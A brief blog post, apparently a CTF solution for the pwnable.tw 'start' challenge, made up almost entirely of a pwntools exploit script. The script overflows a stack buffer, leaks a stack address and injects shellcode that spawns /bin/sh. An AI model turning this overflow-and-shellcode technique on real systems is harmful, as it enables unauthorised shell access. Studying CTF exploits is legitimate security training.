[pwnable.tw]-Start

2018-11-07  本文已影响0人  2mpossible

exp:

from pwn import *
context.log_level = 'debug'
p = process('./start')


p.recvuntil(' CTF:')
#gdb.attach(p)
p.send('a'*0x14 + p32(0x08048087))

leak_stack = u32(p.recv(4))
log.success("leak stack add: 0x%x"%leak_stack)

shellcode = asm(
            '''
            sub esp,0x60
            push 0x0068732f
            push 0x6e69622f
            mov ebx, esp
            mov eax, 0xb
            xor cl, cl
            xor dl, dl
            int 0x80
            '''
                )

p.send('a'*0x14 + p32(leak_stack+0x14) + shellcode)

p.interactive()
上一篇 下一篇

猜你喜欢

热点阅读